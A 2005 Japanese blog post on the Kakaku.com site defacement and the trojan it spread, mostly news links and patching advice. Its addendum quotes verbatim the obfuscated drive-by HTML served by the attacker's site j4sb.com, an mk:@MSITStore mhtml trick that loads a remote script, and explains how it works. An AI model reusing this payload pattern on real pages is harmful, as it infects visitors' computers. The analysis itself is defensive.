ちはろぐ

2005年5月16日(月)(この日の分を読む)

価格com、サイト書き換え＆ウイルス汚染のほぼ正確な情報

エントリーID:1440 [ セキュリティ ] インターネット->セキュリティ/インターネット->ツッコミ | とらっくばっく(0)

« 直前のページへ戻る

バカなんでまた書いてます。それも数名しか見ていないところに書いても無駄なことを……
5/17の追記あり。

価格.comが侵入とサイト書き換えと一部メールアドレス類を取得されてしまった件についてあまりマトモなことを報道している企業サイトがないんだけども、なぜかITmediaがある程度正確な情報を出してます。
「価格.com経由で拡散したウイルス、Windowsの既知の脆弱性を悪用 - 価格.comへの不正アクセスの詳細は不明だが、結果としてばら撒かれたウイルス自体は、既知のWindowsの脆弱性を悪用するもの。パッチを適用していればリスクは下げられる。」(ITmediaEnterprise)
と言うことで、価格.comが書き換えられた当日の5/11に配布されたWindowsの更新もしくは4月の第2水曜まで程度に配布された、Windows及びInternetExplorerの脆弱性に対するパッチをを自動更新もしくはWindowsUpdateで適用していれば、ウイルス対策ソフトの対応が間に合っていなくてもかなり感染のリスクが減るものだそうで。

「tdiary.ishinao.net - IPAに問い合わせをしてみた (13:20)」によると、価格.comは「Site report for kakaku.com」で見ると、18-Nov-2004からWindows Server 2003上のMicrosoft-IIS/6.0で運営されてたそうで(リンク先の表示は時期が変われば内容も変わります)
現在の「価格.com」のサーバレスポンスを ieHTTPheaders やWeb上ツールの「View HTTP Request and Response Header」などで見ると、ヘッダーに Apache とあり、急遽 Red Hat Linux 上にWebサーバーとして Apache/2.0.40 を構築してお知らせのページを公開したようです。

「価格.comが不正アクセスで閉鎖　ユーザーにウイルス感染のおそれも - 価格.comが不正アクセスを受け、14日から閉鎖している。サイトを媒介にウイルスがばらまかれており、ユーザーは感染した可能性がある。」(ITmediaNews)
「価格.com、不正アクセス事件を受けウイルス対策ソフト「NOD32」体験版を提供 - カカクコムはWebサイトへの不正アクセス事件を受け、「価格.com」上で、ウイルス対策ソフト「NOD32」の体験版ファイルの配布を開始した。」(ITmediaEnterprise)
「「最高レベルのセキュリティが破られた」――カカクコム、不正アクセス事件を説明」(ITmediaNews)

最高のセキュリティ状態だったと言う割にはお知らせ公開以前の環境には穴があったとしか言いようが無く。

……なんというか、ユーザーは価格比較ページを見てネット通販や直接店頭に行くようなことをするんなら、インターネットセキュリティソフト/ウイルス対策ソフトに頼りっきりじゃなくて、Windowsの自動更新やWindowsUpdateをしろと……(苦笑)

そしてその辺の安全性や危険性を記載してない企業系ニュースサイトの情報。
「価格.comが一時閉鎖、不正アクセスでトロイの木馬を仕込まれる - 閲覧したユーザーはウイルス感染の恐れも」(ImpressInternet)
「トレンドマイクロ、価格.comで問題になったウイルスに対応～価格.comではNOD32の体験版を配布」(ImpressInternet)
「「ソフト、ハード、運用の全てを刷新」価格.com、23日をめどに復旧 - 穐田社長「今回の攻撃はレベルの高いものだった」」(ImpressInternet)
「価格.comのウイルスに対応した駆除ツール、トレンドマイクロが公開」(ImpressInternet)
「価格.com、不正アクセスの被害を受け14日から閉鎖」(RBB TODAY)
「価格.com経由でウイルスに感染したユーザ向けに対策ソフトを提供」(RBB TODAY)
「価格.comのトロイの木馬。トレンドマイクロも自動駆除ツールのダウンロード提供」(RBB TODAY)
「価格.comの不正アクセスは原因は解明されたものの、被害規模の把握にはいたらず」(RBB TODAY)
「カカクコム緊急会見、「1週間後に復旧目指す」--手口と影響は調査中」(CNET Japan)

どの脆弱性を利用して閲覧ユーザーのPCに侵入し感染するか、そして既に対策されているのかされていないのかを記載してないって言うだけで、かっこ悪いです……

……まぁ、うちが「ちはろぐ」でこんなことを書いてても誰も安心しないし、役に立つこともないと思うけどネ……(>_<)

5/17追記：
「【特別企画】価格.comクラック対策～可能性は低いが閲覧者はウイルス感染確認を」(ImpressInternet)
「続報：価格.comだけではなかったWeb改ざん、改めて検査と警戒を - 改ざんされた「価格.com」経由で広がったトロイの木馬への対応は進んでいるが、一方で、他のWebサイトでも同様の被害が確認された。十分な警戒が必要だ。」(ITmediaEnterprise)
「価格.com」のサイトだけでは無く、他のサイトでも多数感染して閲覧ユーザーを汚染させる可能性があるので、しっかりWindowsUpdateを行い、ウイルス対策ツールも適切に利用することを勧めています。
……Impress特別企画の最後のほうの画像にこっそり今回の感染原因になるインナーフレームに表示されるサイトのURLが写ってたり……うちは画像と同じくIEの「制限付きサイト」に追加っと……
j4sb.com と言うサイトが怪しいらしく、うちはルーター側その他でもアクセスに行けない制限をかけました。

「静岡新聞社の就職活動支援サイトでも価格.comと同手口のクラック～閲覧者はウイルス感染の可能性も」(ImpressInternet)
「不正アクセス被害が拡大　「WindowsCE FAN」や静岡新聞運営サイトにも - ウイルス拡散を媒介させられた「価格.com」と同様の手口で被害を受けたサイトが相次いでいる。」(ITmediaNews)
静岡新聞の「新卒のかんづめ」は ieHTTPheaders で見ると現在でも Microsoft-IIS/5.0 で運営中。送られてくるクッキー(COOKIE)にプライバシーポリシーのP3Pだったかの記載が無いのも微妙……有効時間設定が無いセッションクッキーなので良いのかもしれないけど。
「WindowsCE FAN」は「Site report for www.wince.ne.jp」で見ると、23-Feb-2005時点でWindows Server 2003上でMicrosoft-IIS/6.0で運営していたと言うのは「価格.com」と同じ条件(リンク先は閲覧時期で変わるので注意)
ieHTTPheaders やWeb上ツール「View HTTP Request and Response Header」で見ると未だにWindows Server 2003のMicrosoft-IIS/6.0上で動作中。
……両サイトとも再びサイト書き換えがある可能性も？
記事ではInternetExplorer以外のブラウザを使うことも薦めてるけど、前に入れっぱなしでバージョンアップしてないFirefoxだったりするとそれはそれで穴があるわけで……最新のFirefox1.04も穴が無いとは言えず……結局どっちも一緒のよーな(苦笑)

「価格.comのウイルス、MMORPG「リネージュ」起動中に活動することが判明」(ImpressInternet)
「価格.comから感染したおそれのあるウイルスはリネージュのキー操作を記録」(RBB TODAY)
今回の「価格.com」騒動で埋め込まれたウィルスは「リネージュ」(1なの2なの？)が起動している間のキー操作/マウス操作/メモリー状態を記録してメールで送信するものらしく。

……追っかけてると面白い……(まるで他人事のように読み上げましょう)

そしてバカは特攻しました……ヒャッホー！オラオラー
「Firefox1.04」+機能拡張「LiveHTTPheaders」(こんなんばっか持ってるねぇ……)で一応(一様ではありません)、JAVAとJAVAscriptを切って
http://www.j4sb.com/count/counter.ap?id=a02 を開くっっっっっっっっっ！(くれぐれもマネして開かないように)
そうすると、
「<HTML oncontextmenu="return false"><HEAD><TITLE></TITLE></HEAD><BODY><SCRIPT LANGUAGE="JavaScript.Encode" src="data/a02.css"></SCRIPT><SCRIPT LANGUAGE="JavaScript">var url=document.location.href;url=url.substring(0,url.lastIndexOf('/'));apk='@MS';bpk='ITS';cpk='tore:mh';dpk='tml:c';epk=':\\.mht!';document.write('<oBJEcT Width=0 Height=0 style="display:none;" type="tExt/x-ScRipTlet" dAtA="mk:'+apk+bpk+cpk+dpk+epk+url+'/data/a02.css::/%23"></OBjECT>');window.status=" ";</SCRIPT></BODY><NOSCRIPT><iframe style="display:none;" src='*.*'></iframe></NOSCRIPT></HTML>」
なんてのを返してくるようで。大文字小文字の混じり具合がお子様ダ……
最初に非可読エンコード済みスクリプトとして読み込んでる data/a02.css は http://www.j4sb.com/count/data/a02.css
途中で文字列演算してさらに文字列演算(単なる文字列連結)をしてるのは、
url=document.location.href;url=url.substring(0,url.lastIndexOf('/'));
の結果は http://www.j4sb.com/count/counter.ap?id=a02 から計算して(親フレームのURLからではない)結果は url=http://www.j4sb.com/count で、
"mk:'+apk+bpk+cpk+dpk+epk+url+'/data/a02.css::/%23"の結果は @MSITStore:mhtml:c\\.mht!http://www.j4sb.com/count/data/a02.css::/%23

……http://www.j4sb.com/count/data/a02.css が Firefox1.04で読もうとも、InternetExplorer6.0SP2で読もうとも404NotFound(それもIIS/6.0)なんですけどー？
逃げやがったか！？つまんな～い！

※忠告：色々詳しくないヒトはこう言う事はしないように。

この話題のりんく/Permlink | [ セキュリティ ] インターネット->セキュリティ/インターネット->ツッコミ | とらっくばっく(0) |